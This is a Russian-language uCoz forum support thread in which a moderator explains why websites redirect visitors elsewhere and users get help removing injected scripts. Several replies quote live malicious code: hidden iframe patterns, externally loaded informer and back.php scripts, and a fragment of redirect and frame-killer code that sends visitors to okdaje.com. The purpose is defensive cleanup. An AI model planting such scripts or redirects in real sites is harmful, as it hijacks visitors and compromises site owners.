Модератор форума: Yuri_G  
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 331 | 17:42:53
admin1712, редирект сидит в информере праздники россии

Код
<script language='JavaScript' src='http://www.estpovod.ru/informer_show2.php?news_cnt=5&inf_width=175&bg=FFFFCC&csp=1&cpd=4&fsz=12&bg1=CC6600&fcl1=FFFFFF&fsz1=12&bg2=FFFF99&fcl=BD000D&fsz2=12&wt=&show_dat=&wt1=&grp=10&new='></script>


вот куски кода

Код
if( cHeight <= 250 && dimensionUpdated == 1)
     {
      window.top.location = "http://okdaje.com/?fp=X9rDUDJTtT5x3dA8kqXLfFApwyzh3ROW5RTUe00dYCfnRXOfPyrR0Eyw7nu%2Fxk%2BaDYkZqOYuhG7x6joUN%2B9jAQ%3D%3D&prvtof=2GC3huBb9g3ZfDVFtn3bVTuz6zGXQvBkhpJ7xU%2FTidk%3D&poru=skiflRm4VhENTWQg5ypEUaH4eTHEU5GF0okJHQm4qCza8Nyz8cGDkGaK3GzO9UChR25ohTKuhp8MxQr3u86mp0qLbGy83XRoxhILxqIozACAyy1NwBZKKrDOs3bpMSyJ33GPcS2  uyCox9SN2UaESGswiaVTwmH%2BGVfWwQ2Sx5IlRmaS5pCGc8LfLDVWOSiGc&cifr=1&code=code&bot=Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A21.0%29+Gecko%2F20100101+Firefox%2F21.0";
     }
    }
   }

   applyFrameKiller();
   // -->
</script><frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
   <frame src="http://okdaje.com/?fp=X9rDUDJTtT5x3dA8kqXLfFApwyzh3ROW5RTUe00dYCfnRXOfPyrR0Eyw7nu%2Fxk%2BaDYkZqOYuhG7x6joUN%2B9jAQ%3D%3D&prvtof=6%2FpHrCGXSZybLrc2LIwmPK%2B9RcZvxEGDJKdsQ5cDeGU%3D&poru=b2Wwc4xQuwZvXw5hhZAsP9YVcRSxnspmrl%2F5C7q0Cl%2Bru1d2XCyQLcadTNSVG%2Fuqb0xMBU3BAhB9JceZ0x%2FM10LozFAym93vcViN9as2xbmmZ2K0wrmbqsMx1xC%2Fz  Tzkw0p1YcowF1Uge%2BtycFGFFmeuK%2Fa7LYKYTfcTzg7hjDJWloOstrVKiex3CoYqVvdV&code=code&bot=Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A21.0%29+Gecko%2F20100101+Firefox%2F21.0">
</frameset>
<noframes>
   <body bgcolor="#ffffff" text="#000000">
   <a href="http://okdaje.com/?fp=X9rDUDJTtT5x3dA8kqXLfFApwyzh3ROW5RTUe00dYCfnRXOfPyrR0Eyw7nu%2Fxk%2BaDYkZqOYuhG7x6joUN%2B9jAQ%3D%3D&prvtof=vWEIAtyWbJWUPf4Hm7g1%2Fp%2FO%2F52uSZEL%2Fvw5lxXFoGQ%3D&poru=4sJybtV2JilUjd%2B38bD%2Bu93nhtTOJY8CkGeuNc5ZHq%2F4s79UeqPSCD%2FRMjU6ejXECkva1pAndm2bWHFpSliwR%2B2KPF9r3teHj78BuL4qyW0SofMkeUE355nUESMGt  dgTFuwEDF9yfkpeF2hx8e%2F8vgfPX7SfrG7C0qoWMqFzlEEn4nU%2FYtNhHeOgtneNkEgG&code=code&bot=Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A21.0%29+Gecko%2F20100101+Firefox%2F21.0">Click here to proceed</a>.
   </body>


снимите эти информеры с сайта. ибо мусор, а теперь и зараженный мусор

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
admin1712
Сообщений: 20
Репутация: 0

Сообщение # 332 | 17:50:14
webanet,спасибо большое!
Убрал мусор,всё ОК!
STELS0970
Сообщений: 2
Репутация: 0

Сообщение # 333 | 03:47:13
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 334 | 17:07:18
STELS0970, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

Код
<script language="javascript" src="./js.php?s=54"></script>
поле на что заменить оставляете пустым и производите замену во всех модулях

далее тоже самое делаете со вторым скриптом

в поле что заменить вставляете скрипт

Код
<script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
поле на что заменить оставляете пустым и производите замену во всех модулях

после очистки вы должны обязательно изменить uid пароль

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
STELS0970
Сообщений: 2
Репутация: 0

Сообщение # 335 | 20:41:41
спасибо, так и сделал, на 2-й скрипт в вашем примере падал глаз, а 1-й незаметил даже
Spok2141
Сообщений: 2
Репутация: 0

Сообщение # 336 | 21:15:40
Сайт - http://soft-film.ucoz.ru
из Яндекса переходишь на сайт, и в родительском окне (поисковые результаты Яндекса) происходит перенаправление (редирект) на сторонние ресурсы
что является нарушением поискового индекса в Яндексе (http://webmaster.ya.ru/replies....arent=1)
не могу найти где на сайте находиться вредоносный код.
Подскажите где искать?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 337 | 21:42:13
Spok2141, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете код

Код
<script language="javascript" src="http://gocash1.ru3.biz/js/back.php?id=54"></script>
поле на что заменить оставляете пустым и производите замену во всех модулях и особенно на форуме

после этого обязательно меняете uid пароль

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Spok2141
Сообщений: 2
Репутация: 0

Сообщение # 338 | 00:59:28
Webanet - спасибо. Это просто взломали пароль uID и повесили такую хрень на все мои сайты?
Как защититься от подобных проникновений к содержимому сайта?
brea
Сообщений: 3
Репутация: 0

Сообщение # 339 | 15:08:09
Здравствуйте! Я являюсь сопровожающим школьного сайта, расположенного по адресу http://sivgimn.ucoz.ru Вчера возникли следующие проблемы:
1) При попытке зайти на сайт происходит автоматическая переадресация на http://okdaje.com/?fp=rHl....F537.31
2) В связи с тем, что в начале учебного года в службу техподдержки был отправлен официальный запрос на отключение рекламы, реклама на сайте была отключена. Однако, вчера она появилась снова.
Подскажите, пожалуйста, что делать?
Елена.
Сообщение отредактировал brea - Пятница, 26 Апр 2013, 15:08:35
vitaly576
Сообщений: 319
Репутация: 218

Сообщение # 340 | 15:17:07
brea, удалите этот скрипт из кода страницы:
Код
<script language='JavaScript' src='http://www.estpovod.ru/informer_show2.php?news_cnt=5&inf_width=150&bg=C3C1CA&csp=1&cpd=3&fsz=12&bg1=C3C1CA&fcl1=708090&fsz1=12&bg2=C3C1CA&fcl=708090&fsz2=12&wt=on&show_dat=&wt1=on&grp=10&new='></script>
brea
Сообщений: 3
Репутация: 0

Сообщение # 341 | 15:19:09
biggrin СПАСИБО!
Сообщение отредактировал brea - Пятница, 26 Апр 2013, 15:55:57
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 342 | 15:59:19
brea, так же из блока сегодня удалите скрипт

Код
<script language="JavaScript" src="http://101widgets.com/02022311/200/221"></script>
там вшитая реклама

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
hristianin-usad
Сообщений: 116
Репутация: 739

Сообщение # 343 | 20:23:44
webanet, Привет похоже взломали меня в подлиси сайт
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 344 | 21:17:06
hristianin-usad, неудачная установка соц.кнопок на лицо

Код
<div class="share42init"></div>
<script type="text/javascript" src="http://site.name/share42/share42.js"></script>

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
hristianin-usad
Сообщений: 116
Репутация: 739

Сообщение # 345 | 21:23:39
webanet, точно ставил biggrin
Поиск: